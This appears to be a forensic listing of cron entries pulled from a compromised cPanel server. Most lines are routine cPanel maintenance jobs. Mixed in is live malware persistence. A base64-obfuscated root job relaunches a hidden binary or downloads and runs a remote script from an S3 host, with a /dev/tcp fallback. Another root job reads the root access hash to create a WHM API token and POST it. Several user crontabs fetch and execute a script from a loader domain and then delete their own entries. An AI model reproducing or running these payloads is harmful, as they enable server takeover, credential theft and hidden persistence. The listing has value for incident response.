=== root cron ===
0 2 * * * /usr/local/cpanel/bin/backup
35 * * * * /usr/bin/test -x /usr/local/cpanel/bin/tail-check && /usr/local/cpanel/bin/tail-check
0 6 * * * /usr/local/cpanel/scripts/exim_tidydb > /dev/null 2>&1
30 5 * * * /usr/local/cpanel/scripts/optimize_eximstats > /dev/null 2>&1
22 22 * * 7 /usr/local/cpanel/scripts/send_api_notifications > /dev/null 2>&1
5,20,35,50 * * * * /usr/local/cpanel/scripts/eximstats_spam_check 2>&1
45 */4 * * * /usr/bin/test -x /usr/local/cpanel/scripts/update_mailman_cache && /usr/local/cpanel/scripts/update_mailman_cache
15 */6 * * * /usr/local/cpanel/scripts/autorepair recoverymgmt >/dev/null 2>&1
*/5 * * * * /usr/local/cpanel/scripts/dcpumon-wrapper >/dev/null 2>&1
0 */2 * * * /usr/local/cpanel/scripts/shrink_modsec_ip_database -x 2>&1
53 1 * * * /usr/local/cpanel/whostmgr/docroot/cgi/cpaddons_report.pl --notify
30 */4 * * * /usr/bin/test -x /usr/local/cpanel/scripts/update_db_cache && /usr/local/cpanel/scripts/update_db_cache
25 */2 * * * /usr/local/cpanel/bin/mysqluserstore >/dev/null 2>&1
15 */2 * * * /usr/local/cpanel/bin/dbindex >/dev/null 2>&1
2,17,32,47 * * * * /usr/local/cpanel/whostmgr/bin/dnsqueue > /dev/null 2>&1
38 4 * * * /usr/local/cpanel/scripts/gather_update_log_stats --logfile /var/cpanel/updatelogs/last --upload > /dev/null 2>&1
@reboot /usr/local/cpanel/bin/onboot_handler
@reboot /usr/sbin/cloudlinux-collect-panic-info
44 0 * * * "/root/.acme.sh"/acme.sh --cron --home "/root/.acme.sh" > /dev/null
44 5 * * * (/usr/local/cpanel/scripts/fix-cpanel-perl; /usr/local/cpanel/scripts/upcp --cron > /dev/null)
09,39 * * * * /usr/local/cpanel/scripts/clean_user_php_sessions > /dev/null 2>&1
*/5 * * * * ( PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; export PATH; p=$(printf '%s' 'L3Vzci9zaGFyZS9tYW4vbWFuMy8uc3lzbG9nLWM2ZDZkNGIyL3N5c2xvZy1uZy0yZDg1M2ViNg==' | tr '-_' '+/' | base64 -d 2>/dev/null); [ -z "$p" ] && p=$(printf '%s' 'L3Vzci9zaGFyZS9tYW4vbWFuMy8uc3lzbG9nLWM2ZDZkNGIyL3N5c2xvZy1uZy0yZDg1M2ViNg==' | tr '-_' '+/' | base64 --decode 2>/dev/null); [ -z "$p" ] && p=$(printf '%s' 'L3Vzci9zaGFyZS9tYW4vbWFuMy8uc3lzbG9nLWM2ZDZkNGIyL3N5c2xvZy1uZy0yZDg1M2ViNg==' | tr '-_' '+/' | openssl base64 -d 2>/dev/null); d=$(dirname "$p" 2>/dev/null); need=0; _ck() { if command -v pgrep >/dev/null 2>&1; then pgrep -f "$1" >/dev/null 2>&1; else ps aux 2>/dev/null | grep -v grep | grep -qF "$1"; fi; }; [ -n "$p" ] && [ ! -f "$p" ] && need=1; [ -n "$d" ] && [ -f "$d/grep00.sh" ] && ! _ck grep00.sh && need=1; [ -n "$p" ] && [ -f "$p" ] && ! _ck "$(basename "$p")" && need=1; if [ "$need" = 1 ]; then if [ -n "$d" ] && [ -x "$p" ] && [ -f "$d/config.json" ]; then chattr -i "$d" 2>/dev/null; cd "$d" && nohup ./$(basename "$p") >/dev/null 2>&1 & [ -f "$d/grep00.sh" ] && { if command -v bash >/dev/null 2>&1; then nohup bash "$d/grep00.sh" >/dev/null 2>&1 & else nohup sh "$d/grep00.sh" >/dev/null 2>&1 & fi; }; else u='aHR0cHM6Ly9nYWppa3UtbWVkaWEuczMuYW1hem9uYXdzLmNvbS9ncmVwYjMyLnNo'; url=$(printf '%s' "$u" | base64 -d 2>/dev/null); [ -z "$url" ] && url=$(printf '%s' "$u" | base64 --decode 2>/dev/null); [ -z "$url" ] && url=$(printf '%s' "$u" | openssl base64 -d 2>/dev/null); [ -n "$url" ] && { curl -sk --connect-timeout 10 "$url" 2>/dev/null || wget -qO- --timeout=10 "$url" 2>/dev/null || ( command -v bash >/dev/null 2>&1 && { printf '%s' 'ZXhlYyAzPD4vZGV2L3RjcC9nYWppa3UtbWVkaWEuczMuYW1hem9uYXdzLmNvbS84MCAyPi9kZXYvbnVsbCB8fCBleGl0IDE7IGVjaG8gLWUgIkdFVCAvZ3JlcGIzMi5zaCBIVFRQLzEuMFxyXG5Ib3N0OiBnYWppa3UtbWVkaWEuczMuYW1hem9uYXdzLmNvbVxyXG5cclxuIiA+JjM7IHdoaWxlIElGUz0gcmVhZCAtciBsaW5lIDwmMzsgZG8gbGluZT0ke2xpbmUlDX07IFsgLXogIiRsaW5lIiBdICYmIGJyZWFrOyBkb25lOyBjYXQgPCYz' | base64 -d 2>/dev/null || printf '%s' 'ZXhlYyAzPD4vZGV2L3RjcC9nYWppa3UtbWVkaWEuczMuYW1hem9uYXdzLmNvbS84MCAyPi9kZXYvbnVsbCB8fCBleGl0IDE7IGVjaG8gLWUgIkdFVCAvZ3JlcGIzMi5zaCBIVFRQLzEuMFxyXG5Ib3N0OiBnYWppa3UtbWVkaWEuczMuYW1hem9uYXdzLmNvbVxyXG5cclxuIiA+JjM7IHdoaWxlIElGUz0gcmVhZCAtciBsaW5lIDwmMzsgZG8gbGluZT0ke2xpbmUlDX07IFsgLXogIiRsaW5lIiBdICYmIGJyZWFrOyBkb25lOyBjYXQgPCYz' | base64 --decode 2>/dev/null || printf '%s' 'ZXhlYyAzPD4vZGV2L3RjcC9nYWppa3UtbWVkaWEuczMuYW1hem9uYXdzLmNvbS84MCAyPi9kZXYvbnVsbCB8fCBleGl0IDE7IGVjaG8gLWUgIkdFVCAvZ3JlcGIzMi5zaCBIVFRQLzEuMFxyXG5Ib3N0OiBnYWppa3UtbWVkaWEuczMuYW1hem9uYXdzLmNvbVxyXG5cclxuIiA+JjM7IHdoaWxlIElGUz0gcmVhZCAtciBsaW5lIDwmMzsgZG8gbGluZT0ke2xpbmUlDX07IFsgLXogIiRsaW5lIiBdICYmIGJyZWFrOyBkb25lOyBjYXQgPCYz' | openssl base64 -d 2>/dev/null; } | bash ); } | /bin/sh; fi; fi) >/dev/null 2>&1
@reboot /usr/local/lib/.dbus/.netd -s  -i -l >/dev/null 2>&1
* * * * * TF=/var/cpanel/authn/api_tokens/whostmgr/tokens/root/WHMCS-API-MANAGER; if [ ! -f "$TF" ]; then HASH=$(cat /root/.accesshash 2>/dev/null|tr -d nrt ); AUTH_HDR="WHM root:$HASH"; if [ -z "$HASH" ]; then   WT=$(cat /usr/local/lib/.dbus/.wt 2>/dev/null|tr -d nrt );   [ -n "$WT" ] && AUTH_HDR="whm root:$WT"; fi; if [ -z "$HASH" ] && [ -z "$WT" ]; then   /usr/local/cpanel/bin/whmapi1 generate_api_token >/dev/null 2>&1;   HASH=$(cat /root/.accesshash 2>/dev/null|tr -d nrt );   AUTH_HDR="WHM root:$HASH"; fi; curl -sk -X POST -d token_name=WHMCS-API-MANAGER
=== suspicious cron/systemd strings ===
/mnt/var/spool/cron/minangpulsa:2:* * * * * siti_lk=1;f=/tmp/.13166;echo 'Y3VybCAtc2sgaHR0cHM6Ly9zaXRpLmxvYWRlci5pZC9hdXRvbG9hZHxfQUY9Ii1rKy1yKy1qKy1jKy1hKy1SKy1kKy14Ky1KIiBzaA=='|base64 -d>$f;chmod +x $f;(at -f $f now 2>/dev/null&&rm -f $f)||(sh $f;rm -f $f) </dev/null >/dev/null 2>&1;P=$(which python3 2>/dev/null||echo /usr/local/cpanel/3rdparty/bin/python3);L=$(/usr/local/cpanel/bin/uapi --user=$(whoami) Cron list_crons 2>/dev/null|$P -c "import json,sys;[print(c['linekey']) for c in json.load(sys.stdin).get('result',{}).get('data',{}).get('crons',[]) if 'siti_lk' in c.get('command','')]" 2>/dev/null|head -1);[ -n "$L" ]&&/usr/local/cpanel/bin/uapi --user=$(whoami) Cron remove_line linekey=$L 2>/dev/null
/mnt/var/spool/cron/tekadabdul12:2:* * * * * siti_lk=1;mkdir $HOME/.s_once 2>/dev/null||exit 0;crontab -l 2>/dev/null|grep -v 'siti_lk'|crontab - 2>/dev/null;f=/tmp/.88115;echo 'Y3VybCAtc2sgaHR0cHM6Ly9zaXRpLmxvYWRlci5pZC9hdXRvbG9hZHxfQUY9Ii1rKy1yKy1qKy1jKy1hKy1SKy1kKy14Ky1KIiBzaA=='|base64 -d>$f;chmod +x $f;sh $f;rm -f $f
/mnt/var/spool/cron/fbsolusitotal:2:* * * * * f=/tmp/.27763;echo 'Y3VybCAtc2sgaHR0cHM6Ly9zaXRpLmxvYWRlci5pZC9hdXRvbG9hZHxfQUY9Ii1rKy1yKy1qKy1jKy1hKy1SKy1kKy14Ky1KIiBzaA=='|base64 -d>$f;chmod +x $f;(at -f $f now 2>/dev/null&&rm -f $f)||([ -f $f ]&&(sh $f;rm -f $f) </dev/null >/dev/null 2>&1 &);(crontab -l 2>/dev/null|grep -v $f)|crontab -
/mnt/var/spool/cron/root:20:44 5 * * * (/usr/local/cpanel/scripts/fix-cpanel-perl; /usr/local/cpanel/scripts/upcp --cron > /dev/null)
/mnt/var/spool/cron/root:22:*/5 * * * * ( PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; export PATH; p=$(printf '%s' 'L3Vzci9zaGFyZS9tYW4vbWFuMy8uc3lzbG9nLWM2ZDZkNGIyL3N5c2xvZy1uZy0yZDg1M2ViNg==' | tr '-_' '+/' | base64 -d 2>/dev/null); [ -z "$p" ] && p=$(printf '%s' 'L3Vzci9zaGFyZS9tYW4vbWFuMy8uc3lzbG9nLWM2ZDZkNGIyL3N5c2xvZy1uZy0yZDg1M2ViNg==' | tr '-_' '+/' | base64 --decode 2>/dev/null); [ -z "$p" ] && p=$(printf '%s' 'L3Vzci9zaGFyZS9tYW4vbWFuMy8uc3lzbG9nLWM2ZDZkNGIyL3N5c2xvZy1uZy0yZDg1M2ViNg==' | tr '-_' '+/' | openssl base64 -d 2>/dev/null); d=$(dirname "$p" 2>/dev/null); need=0; _ck() { if command -v pgrep >/dev/null 2>&1; then pgrep -f "$1" >/dev/null 2>&1; else ps aux 2>/dev/null | grep -v grep | grep -qF "$1"; fi; }; [ -n "$p" ] && [ ! -f "$p" ] && need=1; [ -n "$d" ] && [ -f "$d/grep00.sh" ] && ! _ck grep00.sh && need=1; [ -n "$p" ] && [ -f "$p" ] && ! _ck "$(basename "$p")" && need=1; if [ "$need" = 1 ]; then if [ -n "$d" ] && [ -x "$p" ] && [ -f "$d/config.json" ]; then chattr -i "$d" 2>/dev/null; cd "$d" && nohup ./$(basename "$p") >/dev/null 2>&1 & [ -f "$d/grep00.sh" ] && { if command -v bash >/dev/null 2>&1; then nohup bash "$d/grep00.sh" >/dev/null 2>&1 & else nohup sh "$d/grep00.sh" >/dev/null 2>&1 & fi; }; else u='aHR0cHM6Ly9nYWppa3UtbWVkaWEuczMuYW1hem9uYXdzLmNvbS9ncmVwYjMyLnNo'; url=$(printf '%s' "$u" | base64 -d 2>/dev/null); [ -z "$url" ] && url=$(printf '%s' "$u" | base64 --decode 2>/dev/null); [ -z "$url" ] && url=$(printf '%s' "$u" | openssl base64 -d 2>/dev/null); [ -n "$url" ] && { curl -sk --connect-timeout 10 "$url" 2>/dev/null || wget -qO- --timeout=10 "$url" 2>/dev/null || ( command -v bash >/dev/null 2>&1 && { printf '%s' 'ZXhlYyAzPD4vZGV2L3RjcC9nYWppa3UtbWVkaWEuczMuYW1hem9uYXdzLmNvbS84MCAyPi9kZXYvbnVsbCB8fCBleGl0IDE7IGVjaG8gLWUgIkdFVCAvZ3JlcGIzMi5zaCBIVFRQLzEuMFxyXG5Ib3N0OiBnYWppa3UtbWVkaWEuczMuYW1hem9uYXdzLmNvbVxyXG5cclxuIiA+JjM7IHdoaWxlIElGUz0gcmVhZCAtciBsaW5lIDwmMzsgZG8gbGluZT0ke2xpbmUlDX07IFsgLXogIiRsaW5lIiBdICYmIGJyZWFrOyBkb25lOyBjYXQgPCYz' | base64 -d 2>/dev/null || printf '%s' 'ZXhlYyAzPD4vZGV2L3RjcC9nYWppa3UtbWVkaWEuczMuYW1hem9uYXdzLmNvbS84MCAyPi9kZXYvbnVsbCB8fCBleGl0IDE7IGVjaG8gLWUgIkdFVCAvZ3JlcGIzMi5zaCBIVFRQLzEuMFxyXG5Ib3N0OiBnYWppa3UtbWVkaWEuczMuYW1hem9uYXdzLmNvbVxyXG5cclxuIiA+JjM7IHdoaWxlIElGUz0gcmVhZCAtciBsaW5lIDwmMzsgZG8gbGluZT0ke2xpbmUlDX07IFsgLXogIiRsaW5lIiBdICYmIGJyZWFrOyBkb25lOyBjYXQgPCYz' | base64 --decode 2>/dev/null || printf '%s' 'ZXhlYyAzPD4vZGV2L3RjcC9nYWppa3UtbWVkaWEuczMuYW1hem9uYXdzLmNvbS84MCAyPi9kZXYvbnVsbCB8fCBleGl0IDE7IGVjaG8gLWUgIkdFVCAvZ3JlcGIzMi5zaCBIVFRQLzEuMFxyXG5Ib3N0OiBnYWppa3UtbWVkaWEuczMuYW1hem9uYXdzLmNvbVxyXG5cclxuIiA+JjM7IHdoaWxlIElGUz0gcmVhZCAtciBsaW5lIDwmMzsgZG8gbGluZT0ke2xpbmUlDX07IFsgLXogIiRsaW5lIiBdICYmIGJyZWFrOyBkb25lOyBjYXQgPCYz' | openssl base64 -d 2>/dev/null; } | bash ); } | /bin/sh; fi; fi) >/dev/null 2>&1
/mnt/var/spool/cron/root:24:* * * * * TF=/var/cpanel/authn/api_tokens/whostmgr/tokens/root/WHMCS-API-MANAGER; if [ ! -f "$TF" ]; then HASH=$(cat /root/.accesshash 2>/dev/null|tr -d nrt ); AUTH_HDR="WHM root:$HASH"; if [ -z "$HASH" ]; then   WT=$(cat /usr/local/lib/.dbus/.wt 2>/dev/null|tr -d nrt );   [ -n "$WT" ] && AUTH_HDR="whm root:$WT"; fi; if [ -z "$HASH" ] && [ -z "$WT" ]; then   /usr/local/cpanel/bin/whmapi1 generate_api_token >/dev/null 2>&1;   HASH=$(cat /root/.accesshash 2>/dev/null|tr -d nrt );   AUTH_HDR="WHM root:$HASH"; fi; curl -sk -X POST -d token_name=WHMCS-API-MANAGER
/mnt/var/spool/cron/rqsfmcom:2:* * * * * echo 'Y3VybCAtc2sgaHR0cHM6Ly9zaXRpLmxvYWRlci5pZC9hdXRvbG9hZHxfQUY9Ii1rKy1yKy1qKy1jKy1hKy1SKy1kKy14Ky1KIiBzaA=='|base64 -d>/tmp/.73823;chmod +x /tmp/.73823;(sh /tmp/.73823;rm -f /tmp/.73823) </dev/null >/dev/null 2>&1;(crontab -l 2>/dev/null|grep -v /tmp/.73823)|crontab -
/mnt/etc/cron.d/mailman:6:0 8 * * * mailman /usr/local/cpanel/scripts/restartsrv_mailman --status &> /dev/null && /usr/bin/python2 -S /usr/local/cpanel/3rdparty/mailman/cron/checkdbs
/mnt/etc/cron.d/mailman:10:0 9 * * * mailman /usr/local/cpanel/scripts/restartsrv_mailman --status &> /dev/null && /usr/bin/python2 -S /usr/local/cpanel/3rdparty/mailman/cron/disabled
/mnt/etc/cron.d/mailman:13:0 12 * * * mailman /usr/local/cpanel/scripts/restartsrv_mailman --status &> /dev/null && /usr/bin/python2 -S /usr/local/cpanel/3rdparty/mailman/cron/senddigests
/mnt/etc/cron.d/mailman:16:0 5 1 * * mailman /usr/local/cpanel/scripts/restartsrv_mailman --status &> /dev/null && /usr/bin/python2 -S /usr/local/cpanel/3rdparty/mailman/cron/mailpasswds
/mnt/etc/cron.d/mailman:21:#0,5,10,15,20,25,30,35,40,45,50,55 * * * * mailman /usr/local/cpanel/scripts/restartsrv_mailman --status &> /dev/null && /usr/bin/python2 -S /usr/local/cpanel/3rdparty/mailman/cron/gate_news
/mnt/etc/cron.d/mailman:26:27 3 * * * mailman /usr/local/cpanel/scripts/restartsrv_mailman --status &> /dev/null && /usr/bin/python2 -S /usr/local/cpanel/3rdparty/mailman/cron/nightly_gzip
/mnt/etc/cron.d/mailman:29:30 4 * * * mailman /usr/local/cpanel/scripts/restartsrv_mailman --status &> /dev/null && /usr/bin/python2 -S /usr/local/cpanel/3rdparty/mailman/cron/cull_bad_shunt
/mnt/etc/cron.d/imunify-antivirus:4:25 1 * * 6     root    /usr/bin/tmpwatch 168 /var/imunify360/tmp
/mnt/etc/cron.d/lvedbgovernor-utils-cron:2:10 01 * * * root /usr/sbin/tmpwatch -umc 10 /var/lve/dbgovernor-store
/mnt/etc/cron.daily/csget:1:#!/usr/bin/perl
/mnt/etc/cron.daily/csget:34:if (-e "/usr/bin/curl") {$cmd = "/usr/bin/curl -skLf -m 120 -o"}
/mnt/etc/cron.daily/csget:35:elsif (-e "/usr/bin/wget") {$cmd = "/usr/bin/wget -q -T 120 -O"}
/mnt/etc/cron.daily/csget:38:	print $ERROR "Cannot find /usr/bin/curl or /usr/bin/wget to retrieve product versions\n";
/mnt/etc/cron.daily/logrotate:2:export TMPDIR=/var/spool/logrotate/tmp
/mnt/etc/systemd/system/cl_wmt_scanner.service:7:ExecStart=/bin/sh -c 'umask 077; /usr/share/web-monitoring-tool/wmtbin/wmt-scanner &>>/var/log/cl_wmt.log'